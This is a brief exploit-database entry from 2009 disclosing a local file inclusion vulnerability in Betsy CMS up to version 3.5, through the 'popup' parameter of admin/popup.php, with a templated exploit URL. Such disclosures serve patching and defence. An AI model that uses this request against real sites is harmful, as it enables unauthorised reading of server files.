id: 10005
date: 11/21/2009
title: Betsy CMS versions <= 3.5 Local File Inclusion Vulnerability
author: MizoZ
cves: 

============================================================
Betsy CMS versions <= 3.5 Local File Inclusion Vulnerability
============================================================

/*
 
Author          : MizoZ [from MA]
Group           : EvilWay 
 
Good luck DZ :)
 
*/
 
The vulnerability is in the file admin/popup.php on the get $_GET['popup']
 
Exploit :
 
[HOST]/[PATH]/admin/popup.php?popup=[IT INCLUDE FROM admin/]


#  0day.today [2023-03-23]  #